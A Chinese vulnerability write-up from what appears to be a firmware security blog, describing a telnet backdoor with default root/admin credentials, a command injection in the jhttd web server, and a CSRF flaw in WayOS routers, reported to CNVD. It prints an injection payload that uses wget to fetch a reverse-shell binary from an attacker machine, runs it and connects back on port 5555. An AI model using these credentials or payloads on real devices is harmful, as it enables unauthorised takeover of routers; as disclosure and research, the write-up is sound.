维盟wayos多款路由网关设备存在多个漏洞

固件安全
2022-06-01 00:48
66305

wayos维盟路由器漏洞挖掘

漏洞信息

影响WAM_9900等多款WAM系列路由器、网关(带有USB共享功能),包括但不限于WAM系列,SDV系列,21.10.09及之前固件

WAM_9900固件下载

http://www.wayos.com/products/WAM9900siWANquanqianzhaodedaiw.html

漏洞分析

预置后门漏洞

使用binwalk解包,查看路由器启动文件,会自启动telnet,如果能拿到口令,就直接getshell了
使用FirmAE工具仿真固件,运行成功后使用nmap扫描端口,发现开放了telnet端口

访问连接一下,查找指纹关键字

grep -r "telnet"     grep -r "WayOS"


取并集为mqtt_ai
拖入IDA分析,搜索字符串telnet

疑似telnet口令root/admin,尝试登录,成功,但在web文件中没有找到关于telnet的设置页面

这个漏洞不是影响系列所有的网关设备,部分网关设备telnet服务不会随系统启动开启

命令注入漏洞

在文件系统下搜索web服务器,在文件jhttd,其他系列固件中也有命名为jhttd_s,从用户输入获取usb_username和use_husername没有进行完全过滤,拼接的命令直接作为system()参数执行,引发命令注入

登录管理页面,打开usb存储共享服务,提交burp抓包,修改hname为
wget http://192.168.1.2:8000 -O /tmp/re;chmod 777 /tmp/re;/tmp/re 192.168.1.2 5555
将payload进行url编码,本地开启一个http服务,放置编译好的反弹shell文件,监听5555端口

成功getshell

这个漏洞影响所有带有USB共享功能的路由网关设备,最新固件和历史固件都受影响

CSRF

继续分析jhttpd,搜索字符串usb,有一些关于USB共享功能的url,其中usb_upload.htm是等无需经过身份验证的,

usb_upload.htm有删除文件功能,不经身份验证会失败,提示权限不足,抓包删除功能的请求,生成csrf poc

使用认证后的用户打开,会成功删除文件
这个漏洞影响所有带有USB共享功能的路由网关设备,最新固件和历史固件都受影响

总结

总的来说挖到这几个漏洞都不是很难,需要扩展一下自己的思路和实际动手能力,以上三个漏洞均已提交CNVD,但是中高危也不给证书,emmm,其实影响的还是挺多的,几乎涵盖了所有路由网关设备,而且价格还贵。。。行吧,确实也不是高质量漏洞,毕竟很好挖。争取后边挖到一些高质量的洞,大家一起加油。

分享到

参与评论

0 / 200

全部评论 4

zebra的头像
学习大佬思路
2023-03-19 12:14
Hacking_Hui的头像
学习了
2023-02-01 14:20
tracert的头像
前排学习
2022-09-17 01:35
Question的头像
CNVD 一个洞能给审2个月,证书哈哈
2022-06-13 09:06
splash的头像
时间确实长,都先审厂商的吧,个人交的往后排了
2022-06-13 17:27
投稿
签到
联系我们
关于我们